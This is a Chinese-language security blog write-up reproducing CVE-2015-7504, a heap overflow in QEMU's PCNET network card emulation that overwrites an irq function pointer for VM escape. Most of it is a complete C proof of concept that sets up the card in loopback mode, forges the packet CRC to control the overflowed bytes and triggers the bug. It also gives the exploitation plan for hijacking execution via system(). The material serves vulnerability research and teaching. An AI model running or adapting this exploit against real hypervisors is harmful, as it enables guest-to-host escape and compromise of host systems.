CVE-2015-7504是QEMU在仿真pcnet网卡中出现的一个堆溢出漏洞,可以溢出四个字节,可以劫持程序的执行流,结合前面的CVE-2015-5165可以实现任意代码执行。但有一个很致命的问题,宿主机内核需要使用CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE 标志进行编译,否则在溢出的四个字节没法成功修改地址(总体八个字节的地址,因此需要高四字节与目标地址一致)。这个编译标志在目前最新的Ubuntu16.04中似乎已经没有了,所以就不进行完整的复现了,仅复现至PoC部分。

PCNET网卡

AMD 的PCNET系列网卡被许多虚拟机或仿真器支持,如QEMU、VMware和VirtualBox。虽然没有RTL8139简易,但它的支持更加广泛,RTL8139只在QEMU中有支持。

网卡有16位和32位两种模式,这取决于DWIO 的值(储存在卡中变量),16位模式是网卡重置之后的默认模式。网卡有两类内部寄存器:CSR(控制和状态寄存器)和BCR(Bus Control Register)。

1
2
3
4
5
6
7
8
9
10
11
12
0                                  16
+----------------------------------+
| EPROM |
+----------------------------------+
| RDP - Data reg for CSR |
+----------------------------------+
| RAP - Index reg for CSR and BCR |
+----------------------------------+
| Reset reg |
+----------------------------------+
| BDP - Data reg for BCR |
+----------------------------------+

两种寄存器都需要通过设置对应的我们要访问的RAP(寄存器地址端口)寄存器来实现对相应CSR或BCR寄存器的访问。例如,如果想要初始化或者重启网卡,得设置CSR0的bit0和bit1为1,这个操作可以通过设置RAP为0,然后设置CSR为3来实现。

1
2
outw(0x0, PCNET_PORT + RAP);
outw(0x3, PCNET_PORT + RDP);

网卡的配置可以通过填充一个初始化结构体,并将该结构体的物理地址传送到网卡(通过设置CSR[1]和CSR[2])来完成,结构体定义如下(通过查询qemu实现的PCNET的规范,发现这个pcnet_config对应的是32位IDAR的config):

1
2
3
4
5
6
7
8
9
10
struct pcnet_config {
uint16_t mode; /* working mode: promiscusous, looptest, etc. */
uint8_t rlen; /* number of rx descriptors in log2 base */
uint8_t tlen; /* number of tx descriptors in log2 base */
uint8_t mac[6]; /* mac address */
uint16_t _reserved;
uint8_t ladr[8]; /* logical address filter */
uint32_t rx_desc; /* physical address of rx descriptor buffer */
uint32_t tx_desc; /* physical address of tx descriptor buffer */
};

image-20201209211827489

漏洞分析

PCNET网卡在loopback测试模式中接收到大尺寸的数据包时,存在一个堆上的溢出漏洞。PCNET的仿真使用了4kB的缓冲区来存储数据包。如果接收描述符(Tx descriptor)存在ADDFCS标志,那么网卡将在数据包的尾部添加CRC校验码(见pcnet_receive()函数,hw/net/pcnet.c)。在接收小于4096-4字节的时候,不会出现任何问题,但如果这个数据包就是4096字节大小,那么将会在目标缓冲区溢出4个字节。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
ssize_t pcnet_receive(NetClientState *nc, const uint8_t *buf, size_t size_)
{
// .......

if (!(CSR_CRST(s) & 0x8000)) {
#ifdef PCNET_DEBUG_RMD
printf("pcnet - no buffer: RCVRC=%d\n", CSR_RCVRC(s));
#endif
s->csr[0] |= 0x1000; /* Set MISS flag */
CSR_MISSC(s)++;
} else {
uint8_t *src = s->buffer;
hwaddr crda = CSR_CRDA(s);
struct pcnet_RMD rmd;
int pktcount = 0;

if (!s->looptest) {
memcpy(src, buf, size);
/* no need to compute the CRC */
src[size] = 0;
src[size + 1] = 0;
src[size + 2] = 0;
src[size + 3] = 0;
size += 4;
} else if (s->looptest == PCNET_LOOPTEST_CRC ||
!CSR_DXMTFCS(s) || size < MIN_BUF_SIZE+4) {
uint32_t fcs = ~0;
uint8_t *p = src;

while (p != &src[size])
CRC(fcs, *p++);
*(uint32_t *)p = htonl(fcs); // bug here
size += 4;
} else {
uint32_t fcs = ~0;
uint8_t *p = src;

while (p != &src[size-4])
CRC(fcs, *p++);
crc_err = (*(uint32_t *)p != htonl(fcs));
}
// .......
}

在上面的代码中变量s指向PCNET的主要结构PCNetState_st,从它的结构来看(见下)。溢出会修改它的irq成员的低4字节,通过对CRC的逆向,可以完全控制溢出的4字节的内容。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
struct PCNetState_st {
NICState *nic;
NICConf conf;
QEMUTimer *poll_timer;
int rap, isr, lnkst;
uint32_t rdra, tdra;
uint8_t prom[16];
uint16_t csr[128];
uint16_t bcr[32];
int xmit_pos;
uint64_t timer;
MemoryRegion mmio;
uint8_t buffer[4096]; // overflow here
qemu_irq irq;
void (*phys_mem_read)(void *dma_opaque, hwaddr addr,
uint8_t *buf, int len, int do_bswap);
void (*phys_mem_write)(void *dma_opaque, hwaddr addr,
uint8_t *buf, int len, int do_bswap);
void *dma_opaque;
int tx_busy;
int looptest;
};

这个irq成员变量指向一个IRQState结构的指针,该结构又含有函数指针。

1
2
3
4
5
6
7
8
9
10
11
12
// include/hw/irq.h
typedef struct IRQState *qemu_irq;

typedef void (*qemu_irq_handler)(void *opaque, int n, int level);

// hw/core/irq.c
struct IRQState {
Object parent_obj;
qemu_irq_handler handler;
void *opaque;
int n;
};

这个函数将会被调用多次。例如,在pcnet_receive()函数的末尾,将会调用pcnet_update_irq(),其中会继续调用qemu_set_irq()

1
2
3
4
5
6
7
8
// hw/core/irq.c
void qemu_set_irq(qemu_irq irq, int level)
{
if (!irq)
return;

irq->handler(irq->opaque, irq->n, level);
}

利用的流程

  • 构造一个IRQState结构,其中包含一个想要执行的函数的指针(如:system()
  • 计算构造的结构的准确地址。通过前述CVE-2015-5165泄露的基地址,可以达成这个目标。
  • 伪造一个4kB的数据包。对CRC进行逆向,使其指向构造的IRQState结构
  • 发送数据包

loopback接收之后:

  • 将收的数据包拷贝到缓冲区
  • 计算数据包的CRC,添加到末尾,也就覆盖了irq变量的低4字节
  • 调用pcnet_update_irq()函数,触发目标函数指针。

PoC

Poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <stdint.h>
#include <arpa/inet.h>
#include <sys/io.h>
#include <unistd.h>
#include <string.h>
#include <assert.h>

// page relevant
#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT)
#define PFN_PRESENT (1ULL << 63)
#define PAGE_PFN ((1ULL << 55) - 1)
#define PAGE_MASK ((1 << PAGE_SHIFT) - 1)

#define PAGE_ALIGNED __attribute__((aligned(PAGE_SIZE)))

#define PCNET_PORT 0xc140

#define PCNET_BUFFER_SIZE 4096

#define DRX 0x0001
#define DTX 0x0002
#define LOOP 0x0004
#define DXMTFCS 0x0008
#define INTL 0x0040
#define DRCVPA 0x2000
#define DRCVBC 0x4000
#define PROM 0x8000

enum pcnet_register {
RDP = 0x10,
RAP = 0x12,
RST = 0x14,
};

#define CRC(crc, ch) (crc = (crc >> 8) ^ crctab[(crc ^ (ch)) & 0xff])

/* generated using the AUTODIN II polynomial
* x^32 + x^26 + x^23 + x^22 + x^16 +
* x^12 + x^11 + x^10 + x^8 + x^7 + x^5 + x^4 + x^2 + x^1 + 1
*/
static const uint32_t crctab[256] = {
0x00000000, 0x77073096, 0xee0e612c, 0x990951ba,
0x076dc419, 0x706af48f, 0xe963a535, 0x9e6495a3,
0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988,
0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91,
0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de,
0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7,
0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec,
0x14015c4f, 0x63066cd9, 0xfa0f3d63, 0x8d080df5,
0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172,
0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b,
0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940,
0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59,
0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116,
0x21b4f4b5, 0x56b3c423, 0xcfba9599, 0xb8bda50f,
0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924,
0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d,
0x76dc4190, 0x01db7106, 0x98d220bc, 0xefd5102a,
0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433,
0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818,
0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01,
0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e,
0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457,
0x65b0d9c6, 0x12b7e950, 0x8bbeb8ea, 0xfcb9887c,
0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65,
0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2,
0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb,
0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0,
0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9,
0x5005713c, 0x270241aa, 0xbe0b1010, 0xc90c2086,
0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f,
0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4,
0x59b33d17, 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad,
0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a,
0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683,
0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8,
0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1,
0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe,
0xf762575d, 0x806567cb, 0x196c3671, 0x6e6b06e7,
0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc,
0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5,
0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252,
0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b,
0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60,
0xdf60efc3, 0xa867df55, 0x316e8eef, 0x4669be79,
0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236,
0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f,
0xc5ba3bbe, 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04,
0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d,
0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a,
0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713,
0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38,
0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21,
0x86d3d2d4, 0xf1d4e242, 0x68ddb3f8, 0x1fda836e,
0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777,
0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c,
0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45,
0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2,
0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db,
0xaed16a4a, 0xd9d65adc, 0x40df0b66, 0x37d83bf0,
0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9,
0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6,
0xbad03605, 0xcdd70693, 0x54de5729, 0x23d967bf,
0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94,
0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d,
};

struct pcnet_config32 {
uint16_t mode; /* working mode: promiscusous, looptest, etc. */
uint8_t rlen; /* number of rx descriptors in log2 base */
uint8_t tlen; /* number of tx descriptors in log2 base */
uint8_t mac[6]; /* mac address */
uint16_t _reserved;
uint8_t ladr[8]; /* logical address filter */
uint32_t rx_desc; /* physical address of rx descriptor buffer */
uint32_t tx_desc; /* physical address of tx descriptor buffer */
};

struct pcnet_desc {
uint32_t addr;
int16_t length;
int8_t status_1;
int8_t status_2;
uint32_t misc;
uint32_t _reserved;
};

static uint8_t pcnet_packet[PCNET_BUFFER_SIZE] = {
0x52, 0x54, 0x00, 0x12, 0x34, 0x58,
0x52, 0x54, 0x00, 0x12, 0x34, 0x58,
0x08, 0x00,
};

uint64_t gva_to_gpa(void *addr)
{
int fd = open("/proc/self/pagemap", O_RDONLY);
if (fd < 0) {
perror("open");
exit(-1);
}

uint64_t pme, gfn;
uint64_t offset;
offset = ((uintptr_t)addr >> 9) & ~7;
lseek(fd, offset, SEEK_SET);
read(fd, &pme, 8);
printf("pme: 0x%llx\n", pme);
if (!(pme & PFN_PRESENT)) {
return -1;
}

gfn = pme & PAGE_PFN;

close(fd);

return (gfn << PAGE_SHIFT) | ((uintptr_t)addr & PAGE_MASK);
}

/*
int fd;
uint32_t page_offset(uint32_t addr)
{
return addr & ((1 << PAGE_SHIFT) - 1);
}

uint64_t gva_to_gfn(void *addr)
{
uint64_t pme, gfn;
size_t offset;
offset = ((uintptr_t)addr >> 9) & ~7;
lseek(fd, offset, SEEK_SET);
read(fd, &pme, 8);
if (!(pme & PFN_PRESENT))
return -1;
gfn = pme & PAGE_PFN;
return gfn;
}

uint64_t gva_to_gpa(void *addr)
{
uint64_t gfn = gva_to_gfn(addr);
assert(gfn != -1);
return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}
*/

void pcnet_desc_config(struct pcnet_desc *desc, void *buffer, int is_rx)
{
uint16_t bcnt = -PCNET_BUFFER_SIZE;
bcnt &= 0xfff;
bcnt |= 0xf000;

memset(desc, 0, sizeof(struct pcnet_desc));
memset(buffer, 0, PCNET_BUFFER_SIZE);
desc->addr = (uint32_t)gva_to_gpa(buffer);
desc->length = bcnt;

if (is_rx) {
// receive buffers owned by the card
desc->status_2 = 0x80;
}
else {
desc->status_2 = 0x83;
}
}

uint64_t pcnet_card_config(struct pcnet_config32 *config,
struct pcnet_desc *tx_desc,
struct pcnet_desc *rx_desc)
{
memset(config, 0, sizeof(struct pcnet_config32));

config->mode = LOOP | PROM;
config->tx_desc = (uint32_t)gva_to_gpa(tx_desc);
config->rx_desc = (uint32_t)gva_to_gpa(rx_desc);

return gva_to_gpa(config);
}

// PCNET primitives
void pcnet_packet_patch_crc(uint8_t *packet, uint32_t current,
uint32_t target)
{
size_t i = 0, j;
uint8_t *ptr;
uint32_t workspace[2] = { current, target };
for (i = 0; i < 2; i++)
workspace[i] &= (uint32_t)~0;
ptr = (uint8_t *)(workspace + 1);
for (i = 0; i < 4; i++) {
j = 0;
while(crctab[j] >> 24 != *(ptr + 3 - i)) j++;
*((uint32_t *)(ptr - i)) ^= crctab[j];
*(ptr - i - 1) ^= j;
}
strncpy(packet, ptr - 4, 4);
}

void pcnet_packet_send(struct pcnet_desc *desc, void *buffer,
void *packet, size_t len)
{
if (len <= PCNET_BUFFER_SIZE) {
memcpy(buffer, packet, len);
desc->status_2 |= 0x23;

len = -len;
len &= 0xfff;
len |= 0xf000;
desc->length = len;

// flip ownership to card
desc->status_2 |= 0x80;

// send packet
outw(0, PCNET_PORT + RAP);
outw(8, PCNET_PORT + RDP);
}
}

int main(int argc, char *argv[])
{
// fd = open("/proc/self/pagemap", O_RDONLY);

struct pcnet_config32 pcnet_config;
uint32_t pcnet_config_mem;
uint32_t pcnet_tx_desc_mem;
uint32_t pcnet_rx_desc_mem;
struct pcnet_desc pcnet_tx_desc PAGE_ALIGNED;
struct pcnet_desc pcnet_rx_desc PAGE_ALIGNED;
uint64_t *pcnet_tx_buffer, *pcnet_rx_buffer;

void *addr;

uint32_t fcs = ~0;
uint8_t *ptr;

uint16_t lo, hi;

iopl(3);

addr = aligned_alloc(PAGE_SIZE, PCNET_BUFFER_SIZE);
pcnet_tx_buffer = (uint64_t *)addr;

addr = aligned_alloc(PAGE_SIZE, PCNET_BUFFER_SIZE);
pcnet_rx_buffer = (uint64_t *)addr;

pcnet_desc_config(&pcnet_tx_desc, pcnet_tx_buffer, 0);
pcnet_desc_config(&pcnet_rx_desc, pcnet_rx_buffer, 1);

pcnet_config_mem = (uint32_t)pcnet_card_config(&pcnet_config,
&pcnet_tx_desc,
&pcnet_rx_desc);
pcnet_tx_desc_mem = (uint32_t)gva_to_gpa(&pcnet_tx_desc);
pcnet_rx_desc_mem = (uint32_t)gva_to_gpa(&pcnet_rx_desc);

lo = (uint16_t)pcnet_config_mem;
hi = (uint16_t)(pcnet_config_mem >> 16);

// compute required crc
ptr = pcnet_packet;
while (ptr != &pcnet_packet[PCNET_BUFFER_SIZE - 4]) {
CRC(fcs, *ptr++);
}
pcnet_packet_patch_crc(ptr, fcs, htonl(0xdeadbeef));

// soft reset
inw(PCNET_PORT + RST);

// set software style
outw(58, PCNET_PORT + RAP);
outw(0x102, PCNET_PORT + RDP);

// card config
outw(1, PCNET_PORT + RAP);
outw(lo, PCNET_PORT + RDP);
outw(2, PCNET_PORT + RAP);
outw(hi, PCNET_PORT + RDP);

//CSR_DPOLL
outw(4, PCNET_PORT + RAP);
outw(0x1000, PCNET_PORT + RDP);

// init and start
outw(0, PCNET_PORT + RAP);
outw(3, PCNET_PORT + RDP);

//set CSR_SPND
outw(5, PCNET_PORT + RAP);
outw(0x1, PCNET_PORT + RDP);

//CSR_PROM
outw(15, PCNET_PORT + RAP);
outw(0x8004, PCNET_PORT + RDP);

//CSR_CRST
outw(41, PCNET_PORT + RAP);
outw(0x8000, PCNET_PORT + RDP);

//clear CSR_SPND
outw(5, PCNET_PORT + 0x12);
outw(0, PCNET_PORT + 0x10);

sleep(2);
pcnet_packet_send(&pcnet_tx_desc, pcnet_tx_buffer, pcnet_packet,
PCNET_BUFFER_SIZE);

return 0;
}

tips

下面这个命令可以查看设备与网卡的对应关系

1
$ ls -l /sys/class/net

参考

  1. VM escape QEMU Case Study
  2. qemu逃逸漏洞解析
  3. Resery/Virtualized_Learning
  4. AMD PCNET osdev.org